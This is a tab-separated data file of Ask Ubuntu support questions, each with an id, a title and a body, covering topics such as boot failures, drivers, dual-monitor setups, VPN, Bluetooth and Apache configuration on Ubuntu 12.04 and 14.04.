473976	ubuntu 14.04 fatal exception	i use ubuntu 14.04 , 64-bit . i installed virtualbox and was testing another linux os ( deepin ) . my system froze and i could not get to a tty session to reboot . i had to do a hard restart and when ubuntu restarted i got various error codes one of which was `` kernel panic - fatal exception in interrupt '' booting to advance mode and attempting repairs did not work ( fsck , grub repair , etc ) i reinstalled ubuntu and chose the option to keep my files intact . i can now access my system but many programs i have installed do not work . my question is ; i have a deja-dup backup ( but only of my home directory ) , is it better to restore my backup files or do i have to reinstall all of my programs ? the weird thing is , the programs i verified using the software center to see if they were installed are checked as installed , but wo n't appear in dash .
473977	both bluetooth and wifi not connecting	i 'm having problems both with bluetooth and wifi , my pc is a lenovo b5400 . the bt can do a scan , but it is n't able to find any devices ; i do n't see any wifi network ( but i have a working ethernet connection ) . i read many topics on the internet but before trying different solutions and make some changes ( i just installed ubuntu 14.04 ) i would firstly try to understand what could the problem depend on . what are the commands i can use to see what 's going on ? thank you in advance
473981	how to know whether am the administrator of my ubuntu ?	is there a way to know whether am the administrator of my ubuntu 14.04 ? if not , how can i became the administrator ?
473982	can not find camera	i have ubuntu 14.04 x64 and my webcam ( bus 004 device 003 : id 046d:092e logitech , inc. quickcam chat ) works with cheese* and xawtv , but does n't work with ffmpeg and flash ( 13.0.0.214 ) in chrome ( 35.0.1916.114 ) please help me to understand why ?
473988	unable to see ubuntu partition on windows	i have dual-booted windows 7 and ubuntu 14.04 on my laptop . i can browse files stored in windows partition in ubuntu os but i can not browse or see ubuntu partition in 'my computer ' in windows . please help how can i access my files of ubuntu partition in windows 7 partition ?
473990	can i save a file from ram ?	to be more specific , here 's the situation . i was working on mypaint from a blank document and , after a few hours during which i did n't save anything ( of courseâś ) the program freezed . i did n't close it . in the mypaint autosave directory , the file is corrupted ( 1,4 ko only ) . so , i was wondering if i can dump the file from the ram ( the process is still running ) and how . thank you .
473991	mozilla eudora in ubuntu 12.04	although manual installation is possible , can mozilla 's eudora be integrated in ubuntu 12.04 software center ?
473993	run windows and ubuntu in parallel	i have read about virtualbox that in virtualbox we can run both windows and ubuntu in parallel , but it seems that for this we have to make one host and install the other one in it using virtualbox . i am already using both ubuntu and windows on my pc ( dual boot ) , and i want to run the already existing ones in parallel instead of installing one of them again ( i do n't want to install the programs again ) . so is there a way that i can do this ?
473997	help booting/installing ubuntu 14.04	so i have been trying to boot 14.04 but i keep getting an error screen . some relevant information is that i wiped my hard drive because windows 8 and ubuntu 12.04 both were not working properly . i wanted my laptop just to have ubuntu 14.04 . i have looked into this problem before posting here and some suggest to boot from a live cd and work from there , but i do not have a live cd and do not know how to make one either .
473999	how can i keep vpn running even after exiting terminal ?	i have a program that runs on ubuntu ( 14.04 ) whether i am in the terminal or not . this program relies on a vpn connection , for which i am using vpnc ( cisco ) . i have added vpnc to my reboot and start up processes , and my program works fine when i reboot ( and soon thereafter log in to the terminal ) . but when i exit the terminal , i lose the vpn connection and the program throws an exception . can anyone help me figure out how to keep the vpn connection running even after i log out of the terminal ?
474002	why my newly created account is asking for a pasword if i did n't set one ?	i tried to create a new user account from 'user accounts ' in the system settings . first i pressed the unlock button and the + button . then i chose standard account type and filled account name . then i pressed add button and the account is shown there . it did n't asked for any password when the new user account was created . when i tried to access the new account after a system restart , surprisingly , it asked for a password . why they asked a password now ?
474005	multi-booting in my laptop	i have 3 primary partitions-one is system reserved ( created by windows 7 automatically when installed ) , another one is windows 7 and the remaining one is extras ( d : ) .i have 72 gb free space.i want to use 4 operating systems including windows 7.the remaining 3 are-kali , ubuntu and debian.now , i have 4 gb ram.i will always save my personal files to the 'extras ' partition ( 320 gb ) , so according to the official documentation , i have to spare 8 gb for swap.so , i will have total amount of ( 72-8 ) gb=64 gb space to install the 3 oses.i am planning to leave 24 gb for ubuntu,20 gb for kali and 20 gb for debian.will it be okay ? or , do i have to make separate /home partition for each one of them ? i heard that home partition is for saving personal datas and system configuration ( which will be less than 1 gb in most cases ) .i also heard that in 10 gb,12 gb and 8 gb ; ubuntu , kali and debian should be running fast ( respectively ) .so.if i do n't create a separate home partition , and instead of that provide extra 1gb ( app setting ) ++9 gb ( for small amount of data ) =10 gb total , will my system run finely ? ( in case of ubuntu-1gb ++13gb and in case of kali 1gb++7gb ) .
474007	ubuntu 14.04 system hangs after installing pam module for ldap client with intel_rapl : no valid rapl domains found in package 0	i am running vmware workstation 10.0.2 on a windows 8.1 host . i installed ubuntu server 14.04 as a virtual machine . everything works fine . all updates , upgrades and dist-upgrades are installed . after that i followed this procedure to connect to my ldap server . after rebooting the system it hangs with the following error in the terminal screen : intel_rapl : no valid rapl domains found in package 0 i 've seen the error before on this forum , however there it was non intrusive and could be mitigated by adding paevm = `` true '' to the vmx config of the virtual machine . i tried that , but without any results . see this fix . how can i get the pam ldap client working on ubuntu 14.04 ?
474008	`` installer seems to be corrupted '' error when i attempt to install netbeans from the .sh script	i am trying to install netbeans in my ubuntu 14.04 , but it shows me an error . gts @ ps : ~/desktop $ sudo ./netbeans-8.0-php-linux.sh configuring the installer ... searching for jvm on the system ... extracting installation data ... installer file /home/gts/desktop/netbeans-8.0-php-linux.sh seems to be corrupted i redownloaded the file but that did not solved the issue .
474011	boot ubuntu from usb	i have a laptop with windows 8.1 . i 'm going to use a usb stick to dual boot ubuntu from . i only wish to install the boot and swap on the usb , for /home i 'm going to use a partition from the hard-drive for ubuntu to install . how should i proceed setting this up ?
474013	why keyboard layout change to ru after suspend , reboot , hibernate ?	i 'm using 2 input sources - en and kz ( kazakhstan ) . in system settings - > text entry en is upper then kz , as i understand this is means that en is default layout . if i suspend my laptop and then resume , kz layout is appear . even if en was while suspending . why ? how can i do en default layout after resume , reboot , boot ?
474014	is it possible to allow the user account to access the 'volumes ' without asking the administrator 's password ?	am the administrator of my ubuntu system . recently i added a new user account . but when ever the user tries to access or open the 'volumes ' ( drives where movies , songs and other files are stored ) it asks for the administrator 's password . i created the user account to my other family members and i do n't want to tell them my password . so is it possible to allow them to access the volumes without asking administrator 's password ? update 1 : ubuntu was installed alongside windows in my system . i will provide a screenshot of the volume details - update 2 :
474019	how do i encrypt an external ( usb ) hard drive	i 'm running ubuntu 14.04 lts and i have a western digital external hard drive ( passport ultra ) mounted . i want to encrypt the entire drive . wd has windows and mac utilities available , but nothing for linux/ubuntu . i have consulted ubuntu help and found one article ( https : //help.ubuntu.com/community/encryptedfilesystemsonremovablestorage ) , but the material appears to be seriously dated . the article recommends installing a utility , gnome-disk-utility , but my attempt to do so failed owing to dependency problems which i am not sufficiently knowledgeable even to attempt to resolve.the help article also gives a routine for encrypting entirely from the terminal , but i am hesitant to try because apparently it has n't been tested since version 10.04 . so my questions are : 1. is there a gnome-disk-utility package available for 14.04 ( and if so , where ) or failing that 2. is the command line routine reliable for 14.04 ? any help would be much appreciated .
474022	xmodmap pointer setting does n't affect all applications	i have a laptop designed for windows 8 and running ubuntu 14.04 . because it is designed for windows 8 , the touchpad is backwards . the scroll bars on the side and top are reversed so that it feels like the opposite of a scroll wheel . to try and solve the problem i created the file `` ~/.xmodmap '' with the following text pointer = 1 2 3 5 4 7 6 8 9 10 11 12 this works for some applications . google chrome now works properly and scrolling is back to scroll wheel style . firefox also works properly and so does the terminal and libre office . some applications however do not accept the new settings and stubbornly remain in backwards scroll mode . examples are gedit , the ubuntu software centre and the document viewer . how do i get the scroll behaviour to be consistently like a standard scroll wheel ?
474023	i have forgotten my system password how do i recover it so i can upgrade or create a boot loader ?	how can i recover my system password ?
474026	no ping to gateway although received dhcp lease from gateway	i try to connect my server to my network over wpa2 . after ifup wlan0 i get a valid dhcp lease from my gateway ( 192.168.1.1 ) . however , if i try to ping/access any computer ( internal network , gateway , internet ) no connection is possible . is there any way to access my network and the internet ? /etc/network/interfaces : auto wlan0 iface wlan0 inet dhcp wpa-driver wext wpa-ssid mynetwork wpa-psk mysecretpassword wpa-key-mgmt wpa-psk wpa-pairwise ccmp tkip wpa-group ccmp tkip wpa-proto rsn wireless-mode managed as i get a dhcp lease wpa2 encryption should work well . i already tried to set a fixed ip but i 'm stuck there as well .
474033	slow desktop frame rate with 1920 x 1080p monitor	i 'm kind of new to this ubuntu thing , but i 've used it before a little bit ! so i installed ubuntu 14.04 lts , and everything installed normally . on my 15 '' acer monitor everything ran normal ! the moment i connect my aoc 21 '' 1080p monitor , frame rate just drops ! only on the desktop though . here in fire fox my frames are fine ! so summary of my problem : whenever my 1080p monitor is connected desktop frame rate drops tremendously . to the point of barely being able to navigate the screen . any help would be highly appreciated ! i 'm open to all suggestions ! thanks in advance ! ~matthew
474034	what is the path to the kernel header files for the 3.13.0-27-generic kernel ?	i am installing vmware tools on virtual machine lubuntu and is asking me to enter the path to the kernel header files for the 3.13.0-27-generic kernel ? what should i enter ?
474043	smart dns server configuration on my ubuntu vps	i need to configure smart dns proxy server on my ubuntu vps so all people can connect to my vps dns and watch website content like overplay . i need expert help and detailed steps for how to get ready server . what are the requirements for that ?
474044	network history does n't work	i am aware of why does n't system monitor show activity over ethernet connections ? and it worked in ubuntu 14.04 , but i have the same problem now that i went back on ubuntu 12.04 lts and installing mainline kernel does not fix the problem . can you advise me on how to work around it ? thanks ! **i am using net speed gnome extension and system monitor , they both display 0 ( zero ) even though i am connected **
474047	is my harddrive broken ?	i 've got a new 4tb drive . my old ( 2tb ) drive was ntfs formatted . i formatted my new drive with a single 4tb partition to ext4 . i 've moved content of my old drive to the new drive to format my old drive also as ext4 . mv /media/old_drive/* /media/new_drive/ everything worked as expected until here . now i wanted to move the content back to the old drive mv /media/new_drive/* /media/old_drive/ almost 800gb of data was copied flawless . now its weird : copying or moving from the new to the old drive is slow . like 0.1kb/s per second . first thoughts : oh no , drive is broken / whatever what i 've test from now on : reboot cp instead of mv cp / mv single files instead all at once tried different files / folders everytime the same problem . starts fast - like 1gb in some seconds- but then its slow as hell again . `` okay , seriously this drive has to be broken '' now it 's getting interesting . when i copy from or to one of the two drives mentioned above to ( or from ) a third drive : everything is okay . cp/mv /media/another_drive/something /media/new_drive/ # fast , is okay cp/mv /media/another_drive/something /media/old_drive/ # fast , is okay cp/mv /media/new_drive/something /media/another_drive/ # fast , is okay cp/mv /media/old_drive/something /media/another_drive/ # fast , is okay do you have any ideas ? i have no idea know whats wrong with this drive.. some more 'analytics ' : $ sudo hdparm -tt /dev/sdd /dev/sdd : timing cached reads : 15794 mb in 2.00 seconds = 7903.50 mb/sec timing buffered disk reads : 368 mb in 3.01 seconds = 122.40 mb/sec $ sudo hdparm -tt /dev/sdc /dev/sdc : timing cached reads : 16178 mb in 2.00 seconds = 8095.35 mb/sec timing buffered disk reads : 368 mb in 3.00 seconds = 122.61 mb/sec rsync -r -- progres /media/new_drive/something /media/old_drive # runs from 50 to 100mb/s to some kb/s , nothing new , seems to be 'frozen ' after some seconds my /etc/fstab /dev/sdc1 /media/drive3 ext4 defaults , rw 0 0 /dev/sdd1 /media/drive4 ext4 defaults , rw 0 0
474049	backendloader thunderbird 24.5.0 + ubuntu 13.10	what does backendloader do or is good for ? when running thunderbird in terminal : ( process:9142 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( thunderbird:9142 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( thunderbird:9142 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised [ calbackendloader ] using libical backend at /home/anonymus1/.thunderbird/******.default/extensions/ { e2fda1a4-762b-4020-b5ad-a41df1933103 } /components/libical.manifest
474052	disable display switching on mouse over on dual monitor setup	notes : * dual monitor setup . primary monitor on left side . * nvidia mobile laptop card with 319 driver installed from additional drivers . * xubuntu 14.04 i just updated my xubuntu 14.04 core a few days ago through the software update ( not sure exactly what it all updated . i usually just click install without checking what it installs ) . it then prompted for a reboot which i accepted and proceeded to reboot the machine . after the reboot , now with my dual monitor setup , if i move my mouse off of the right edge of my primary monitor , the mouse moves over to the other monitor and acts just fine , but my primary monitor will switch the displays and show my other monitor 's display as well . so if my mouse is in the boundary of the primary monitor , my primary monitor and other monitor show their two different displays like expected . but if i move my mouse to the other monitor , both monitors display the same thing which is the other monitor 's display so the primary monitor 's display is not visible ( until you move the mouse back onto the primary monitors screen ) . example behavior primary other -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | mouse here | | | | | | | | dog | | cat | | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - primary other -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | | | mouse here | | | | | | cat | | cat | | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ^^^^ i expect to see dog on both screens still not sure if this has to do with nvidia or xubuntu , but this began happening after the latest software update . either way , i am annoyed and wish to turn it off so i can go back to using my dual monitor setup where i am able to see two different displays at all times .
474056	getting color names from color picker	i am partially red-green color blind and would like to use a color picker to tell me what color things on my screen are . i recognize that utilities exist , such as gpick , grabc , gcolor2 that provide me with rgb or hex values . however , what i really want is for it to tell me that the color that i am looking at is `` red '' or `` orangered '' or some other name that i can relate to . a windows utility that does this is `` what color . '' is there a linux equivalent or workaround ? like maybe i could pipe the output of gpick through some program that translates the hex to some english name for the color ? thanks !
474061	updated kernel - still on old version	so i 'm trying to update my kernel . uname -r shows 3.4.0 , and i 've noticed we 're up to 3.14 these days , with 3.13 seeming to be the current norm . i 've ran the software updater , and it 's downloaded and installed a bunch of 3.13 packages ( the image , and the header , and whatever else ) , and then it requested a reboot . following the reboot , my kernel version is still 3.4.0 . i 've also tried manually installing the three 3.14 packages , and then rebooting , but this has had no effect . what am i missing ?
474062	problems accessing my ubuntu system	i have a problem accessing to my ubuntu 13.04 system . recently i updated from 12 to 13 and after some hard work i am able to input my password and user name , but i ca n't get any further , because the system does n't recognize my password and/or account . so i have no access to the graphic environment , only to a terminal . some people told me that may be it 's a resolution problem . can somebody tell me what 's wrong and what should i do ?
474065	automatic login and encrypted home folder	i installed ubuntu 12.04 . at some point , by accident , i apparently agreed to encrypt the home folder . now i would need to have automatic login , but it is not working . i guess because of the encryption . is there any way i can overcome this without , basically , making a backup of the home folder , unmount the encrypted one and so on ? thanks in advance .
474066	is it possible to stream audio via bluetooth from ubuntu to ubuntu/debian ?	i resuscitated an 14 years old pc with a very good audio set and made a stereo of it . via bluez+pulse i can stream music from my android phone to this pc easily . my ubuntu laptop is paired and connects correctly to the stereo , still does n't succeed in connecting the audio stream ( pactl modules does n't show the audio source , while it appears when the android phone is connected ) . i even tried with mac and win7 as well , it seems any pc can successfully create a bluetooth audio stream . is there any ban or difficulty to stream audio via bluetooth between not portable devices ? thank you for any kind of help .
474070	what do i do since the truecrypt development has stopped ?	i use to use the tool a lot but now the development it has stopped . so are there any good avntertives to it ? see more
474072	why a subshell is needed to execute some commands ?	i have to run this command sudo sh -c `` echo 'nameserver 8.8.8.8 ' > > /etc/resolv.conf '' to append a line nameserver 8.8.8.8 into /etc/resolv.conf file . i know , it could be possible only through subshell . my questions : is that it could be possible without running the command in subshell ? on which cases , a command should be runned in subshell ?
474077	remote-desktop using real vnc viewer from macbook pro to ubuntu	i 'm using real vnc viewer to control an ubuntu server ( ubuntu 12.04 lts , running standard remote desktop ) . conneting my macbook pro is working well and the remote screen is displayed - but my mac side real vnc viewer screen is not updated/refreshed closing an server side application ... ca n't find any adjustment neither on the server side nor on the mac side with real vnc viewer . are there any hints ? connecting windows servers there are no such refresh problems . thanks . jaix
474080	why is there a delay when entering a wrong password ?	when entering the right password the application or the os ( no specific application , pretty much everywhere ) accepts this immediately , but when entering a wrong password there is a slight delay of 1-2 seconds . why is that ?
474084	repair boot after update from 13.10 to 14.04 lts	i have an ubuntu server that 's been around for some time and has gone through several upgrades without any major problems . however , after the last upgrade - from 13.10 to 14.04 - the system simply refuses to boot up again . i get a message somewhere along the lines of : '' disk boot failure . insert system disc and try again . '' i tried using boot-repair , stepping through the instructions , but it encountered an error . hoping for some help i post the url to the report here : http : //paste.ubuntu.com/7545663/ at the end of the report it says `` please do not forget to make your bios boot on sdg1/efi/ubuntu/grubx64.efi file ! '' but i ca n't find in the bios how to do that . i have never had to do that before and its been running like clock for years until now . please tell me if there is need of any further information from my part and thanks in advance for any help i may get .
474085	low text graphics after fglrx update	i 'm using ubuntu 14.04 and after some software updates this morning i just got a black screen after login . this is my graphic card : lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] juniper xt [ radeon hd 5770 ] so i installed from terminal : sudo apt-get install fglrx fglrx-amdcccle and now i 'm able to login , but my text is very ( grainy/ginned/hulled/unshelled ? sorry i do n't know the word ) and sometimes violet , like i 'm using some low quality jpg compression : i hope you can see it from these images . any suggestion about how to fix this ?
474087	download read-edid 3.0.1 to read edid for modern pc with ic2 ?	where can i download the read-edid 3.0.1 package for 12.04.. ? update : found on [ https : //launchpad.net/ubuntu/utopic/amd64/read-edid/3.0.1-2 ] [ 1 ] but failed # get-edid > edid this is read-edid version 3.0.1 . prepare for some fun . attempting to use i2c interface looks like no busses have an edid . sorry ! attempting to use the classical vbe interface performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x11100 `` nvidia '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination does not support ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call failed the edid data should not be trusted as the vbe call failed error : output block unchanged i 'm sorry nothing was successful . maybe try some other arguments
474088	how can i find all files that contain embedded crc32 's	how can i find all files that contain embedded crc32 's e.g . mydocument190_ [ f285e17d ] .pdf using the find command to clarify the crc32 's are always within brackets [ f285e17d ] and the file names may contain both capital lower-case letters and numbers further clarification the crc32 's are in the file name and the purpose is to then pipe the results to another command for verification ( a lot of files only some of which contain aforementioned crc32 's )
474089	what is the different between an normal and admin account ?	what is the different between an normal user account and the admin account in ubuntu ? you must always enter your password if you want do something . can you give a normal account `` limitations '' to do not install or remove anything or to not open any program ? can you also `` hide/deactive '' the terminal and console for a normal user ?
474090	gnome : evolution keeps asking for my password on dashboard	i 'm using ubuntu gnome 14.04 . i have installed dav-mail to access the company 's exchange server and , while evolution is running ( and authentified ) , every time i search for a program ( or something ) in the dashboard , gnome asks me for my exchange password over and over again ... . how do i make it stop ?
474093	how to open cygwin 's xemacs on an ubuntu 's active xorg server ?	i have a windows box and an ubuntu box . ubuntu start up completed , obviously with xorg server running without any problems . ran the command : xhost + so that there should not be any problems running x-programs from any non-localhost host . i have a binary called `` emacs-x11.exe '' on my windows box , installed via cygwin . i need to have it 's gui appear on the ubuntu pc , so i ran the following lines : export display= < ubuntu 's ip on my lan > :0.0 /bin/emacs-x11.exe & this is the error message i got in return : display < ubuntu 's ip on my lan > :0.0 unavailable , simulating -nw emacs : terminal type `` dumb '' is not powerful enough to run emacs . it lacks the ability to position the cursor . if that is not the actual type of terminal you have , use the bourne shell command `term= ... export term ' ( c-shell : `setenv term ... ' ) to specify the correct type . it may be necessary to do `unset terminfo ' ( c-shell : `unsetenv terminfo ' ) as well . i need this to stop , and the the emacs-x11 's gui appear on the running xorg server on my ubuntu . how can i achieve this ?
474094	14.04 laptop and screen problems	i have recently upgraded from 12.04 to 14.04 ( ubuntu ) and i have contracted several problems . first being my laptop 's power occasionally cuts out ( like the battery has been pulled out , and i have to turn it back on , this is without warning ) . secondly is that my screen occasionally turn off for a second or two , then is fine again . i have been looking at my temps and it usually hangs around 50-80 degrees celsius ( 85+ is critical ) . i usually keep my brightness on half , my laptop raised and with a cool draft following . these problems have only started since i upgraded to 14.04 a few days ago . any help ? should and can i downgrade to 12.04 ?
474095	virtual desktop on ipad and windows ( vdi )	it would be interesting to have a development desktop in the cloud so i can work from any computer or tablet in the same enviroment . i think of something like amazon workspaces or this https : //www.dynastack.com/ubuntu-cloud-desktops.php but the services are too expensive is something similar possible with normal virtual/real root server hosting/amazon cloud etc . and an x-windows client ? would this diy solution work on ipad ? the requirements are : cheap , low latency , easy config , works on ipad
474097	how can build relation between rabbitmq-server ( as buffer for request interface ) for my owm locla charm ( process the requests )	the case is here : i decide to use rabittmq-server as interface for request input and using my own charm fro connect to the rabitt mq and process the the requests ! . how can i relate this two ( my charm and rabittmq-server ) together ? thanks
474101	repaire data after choosing erase disk and install ubuntu	i now installed ubuntu and i chose the option : '' erase disk and install ubuntu '' i had a windows and the computer too after this installation all the data is gone ? and cant be repaired ?
474102	ubuntu server does not detect raid hdd	i have formatted in a low level the hard disks of my computer . when i try to install ubuntu server i get this error message : [ ! ! ] partition disks no root file system no root file system is defined . please correct this from the partitioning menu . i do not reach the step that shows : partitionning method in order to choose the manual or guided installation in order to mount manually the root filesystem . when i deactivate the raid option , i see the 2 hdds i have . but when i activate the raid option , i can not see the hdd at all . no doubt that i correctly configured the raid array , however . is not ubuntu able to define a filesystem on hdds that have not ( the ones that are formatted in a low level ) ? how can i fix this trouble ?
474106	can we un-install non critical applications and add our own ?	can we un-install non critical applications and add our own application in ubuntu 14.01 and then redistribute and sell it to people over the web without any legal issues ?
474108	ubuntu 14.04 lts and python 3.4.1	is it possible update default python 3.4 to 3.4.1 ? how ?
474110	online accounts - linkedin	when trying to add linkedin to online accounts , i keep getting invalid redirect_uri . this value must match a url registered with the api key
474115	xrdp and xfce4 ubuntu 14.04 slow refreshrate	i am running ubuntu 14.04 lts 32bit and i am connecting via windows rdp to my ubuntu machine that has xrdp with xfce4 session . network is 40mbps/5mbps . rdp to a windows machine from a windows machine is flawless from same location . i can connect fine , but the refresh rate is horrible . when it fist opens the desktop , the picture drags as seen in this image . the same thing happens when items are opened , closed , etc . windows have the same effect . sometimes up to 4 seconds before the image is rendered , depending on the image . is there a setting to improve the refresh rate or something i can do to fix ?
474117	benchmarking linux flash player and google chrome built in flash player	i use xubuntu 14.04 64 bit , i installed flash player from software center and xubuntu-restricted-extras too are there any benchmarks on linux flash player and google chrome built in flash player ? i just want to see their performance because in theory google 's flash player should be more updated and have better performance than the one we use in firefox . ( that 's what i read everywhere ) i have chrome latest version installed and firefox next , and i found that flash videos in chrome are laggy and they take long time to load . while the same flash videos load much faster in firefox and i tend to prefer watching flash videos in firefox , especially the long ones because it loads them so much faster . i ca n't believe these results on my pc , so is there any way to benchmark flash players performance on both browsers ? i want to know if it 's because of the flash player or the browsers or something else
474120	gateway ip for eth0 and gateway ip for pptp vpn are same	my problem is.. i 'm using laptop at school . in school , the default gateway for ethernet is 192.168.1.1 . i want to connect to a pptp vpn server . the gateway over the vpn connection is also 192.68.1.1 . ( the vpn server assigns 192.168.100.1 to my laptop and i confirmed that it is not used in school . ) in this situation , there is no problem in windows 7 . i think it is enough smart to distinguish two different gateways with the same ip . all connection requests may be forwarded to the vpn gateway . but , in ubuntu , i can not access a file server in the remote site . i guess every connection request is forwarded to the ethernet gateway . how can i send all connection requests to the vpn gateway whose ip is same as the ethernet gateway ?
474121	bluetooth audio and softphone audio input/output	i have a voip softphone software that i would like to start using on my ubuntu 14.04 box . here 's the thing . my system sound right now goes through my hdmi to my speaker system so i can play music all day ; - ) i have a bluetooth headset connected to the machine as well . what i am wondering is if there is a way to : auto-mute the music when a call comes in auto-switch the sound devices when a call comes in , from my hdmi sound device , to my headset auto-switch back when the call ends , and auto-un-mute the music or even just an auto-switch to the headset ? i can always pause the music ; )
474123	what freely available software is equipped for editing pdf bookmarks ?	i know of pdfmod , which i rather like except it has one flaw , i ca n't seem to be able to add bookmarks before pre-existing bookmarks ( see the attached image if this is unclear ) . i 've looked at this question : - which programs can i use to edit pdf files ? that question does not deal specifically with bookmark editing , neither does it specify which software is freely available and which is n't . i should add that i 'm incompetent when it comes to installing software so any software that 's not available in the software centre requires you to detail exactly how i 'm meant to install it . plus , i would specifically like a software that can handle large ( like > 80 mb ) pdf files without lagging like crazy or closing down .
474128	touchpad not working after connecting hdmi cable	i had installed ubuntu 14.04 2 weeks back on my new laptop along side windows 8 . 1 . and it was working fine . but yesterday after i connected ubuntu with my tv using the hdmi cable , the cursor/ pointer stopped working . the pointer is not visible and my touchpad is not working . i connected the hdmi cable with youtube in firefox . but only the wallpaper was visible on the tv . also the right click menu , alt tab window , etc was also visible . but the side menu and the firefox window was not visible . the pointer was visible on the tv and the touchpad was working , i was able to move the pointer . after i removed the hdmi cable , my cursor/pointer disappeared and my touchpad is not responding ! ! i tried to restart many times , but still no luck . its still not visible in the desktop . the pointer is visible in the login screen , but is not responding to the touchpad . i tried to login to my kde session , there too the pointer is visible but is not responding to the touchpad . it is not moving .
474130	there 's an alternative for the windows software `` hash check '' in ubuntu ?	see : http : //code.kliu.org/hashcheck/ there 's an alternative for this shell extension for windows on ubuntu ? see the features for more info never found a solution so convenient..
474133	drivers for dvd burner	i just installed an internal dvd burner in my 12.04 ubuntu box . my first project is burning at .7 % , which must be a default driver . on my laptop which is running 14.04 , brasero burns at full speed . do i need a driver to get the speed in the 12.04 machine ?
474137	nvidia 304 vs. nvidia 304 updates functionality difference ?	what , if any , is the difference between nvidia 304 vs. nvidia 304-updates in terms of functionality , not which repository the update came from . does anyone actually know ? for myself personally , i would like to know because i am currently using nvidia 304 driver in ubuntu 14.04 lts and there does not seem to be any further video problems . additionally , i do n't believe in fixing what is not broken . however , having installed nvidia 304 vs. the nouveau driver that was used by default by the os fixed the video playback issues , but i 'm wondering if i need to use the 304 updates now simply because i would like to upgrade my version of cinnamon ( v.1.4.0 ) on the linux mint 13 maya lts partition . i realize this is an ubuntu os forum , however , mint and ubuntu are essentially from the same dna ( so to speak ) and with regard to video drivers , i do n't see how much different it can possibly be since before i installed nvidia 304 ( as opposed to using the default nouveau ) i had the same video playback problems in mint that i previously had in ubuntu . what i personally want to know is if i need to install nvidia 304 updates in the above referenced mint in order to upgrade to cinnamon 1.6 or 1.8 since i do n't believe anything higher will work given that the laptop and the video adapter are legacy hardware . if anyone can answer or point me in the direction where such a discussion has taken/is taking place then please feel free .
474140	how do i add nodes to my maas cluster ?	i am a newbie in setting up ubuntu maas . i did the following . i setup maas server using ubuntu 14.04 trusty - maas server install . i did post-install tasks like creating logins , importing boot images as explained here : http : //maas.ubuntu.com/docs1.5/install.html i have the boot images in the list for cluster master . problem a : i would like to add nodes to my maas server . so , i did the following : on a second computer , i booted the same cd , went through the steps , and at the maas step - i specified maas server address - it just `` sent sigkill to all process . requesting power off '' via the web interface , i added the node . i added the information needed . one part i did not know was the power type . i just selected wake-on lan and gave the same mac address as that on the computer . is this even correct ? if not , what do i need to give ? after 2 , i did 1. again - still same problem . problem b : in web interface , it says it is commissioning for the node for a long term . any action i try to do , it says `` the action `` commission selected nodes '' could not be performed on 1 node because its state does not allow that action . '' any suggestions are appreciated .
474144	using apache2 to set up a basic webpage	i am having a problem with a test page i set up for my website . the config file ( index.html ) looks like this < html > < head > < title > welcome to website.net ! < /title > < /head > < body > < h1 > success ! the website.net virtual host is working ! < /h1 > < /body > < /html > which should display a page like this in my browser when i navigate to www.mywebsite.net welcome to website.net ! success ! the website.net virtual host is working ! however i get a 403 `` forbidden '' error when i navigate to the page . what am i missing ? i have the directory installed on /var/www/mywebsite.net/public_html/index.html i have the permissions of the /var/www directory set to 755 so that others can read and exicute it but it does not seem to be working . i also have port 80 open on my iptable . the server is a vps server if that makes a difference however i have added a dns record for the ip address . any help is appreciated ! update : here is my virtual host configuration file `` mywebsite.net.conf '' < virtualhost *:80 > # admin email , server name ( domain name ) , and any aliases serveradmin webmaster @ mywebsite.net servername www.mywebsite.net serveralias mywebsite.net # index file and document root ( where the public files are located ) directoryindex index.html index.php documentroot /home/myusername/public/mywebsite.net/public # log file locations loglevel warn errorlog /home/mysuername/public/mywebsite.net/log/error.log customlog /home/myusername/public/mywebsite.net/log/access.log combined < directory /home/myusername/public/mywebsite.net/public > options indexes execcgi includes followsymlinks multiviews allowoverride all order deny , allow allow from all < /directory > < /virtualhost >
474149	unable to install ubuntu 14.04	i have toshiba satellite c850-b798 with windows 7 x64 installed . i downloaded ubuntu desktop x64 iso and burn it to flash memory by universal installer , when i choose to boot from flash it give me nothing only black screen , i enter to bios to disable secure boot but i did n't find this option , also i did n't find uefi or csm . i updated the bios to the last version 6.80 but nothing new happened , and i installed ubuntu x86 but also the same results . i installed win 8.1 x64 and i tried to find uefi but i did n't find it . i tried the iso on vmware and it works well , also flash memory works well . simply , i tried all mentioned solutions but i still ca n't install ubuntu , why ? i also tried unetbootin , same results . there is no problem with boot order , and i installed win 8.1 by the same flash and same boot order and it worked fine
474150	dual monitors/ one working , second only showing ubuntu logo	so i 'm using a monitor on an nvidia gpu and the other one is connected on the integrated intel gpu . i 'm using the first one without a problem , but the second one is n't even detected in displays , but the screen on it is magenta-like and there is the ubuntu logo . any solutions on how i can detect it as a display ?
474151	how to install phpstorm in ubuntu 14.04 lts ?	i have a jetbrains phpstorm 7.1 and i want to install it in ubuntu 14.04 so i installed wine for windows compatibility and i run phpstorm-7.1.exe then it is successfully installed ( i guess ) . so when i run the installed phpstorm it gives me an error it says failed to create jvm : error code -1 so how to fix this one ?
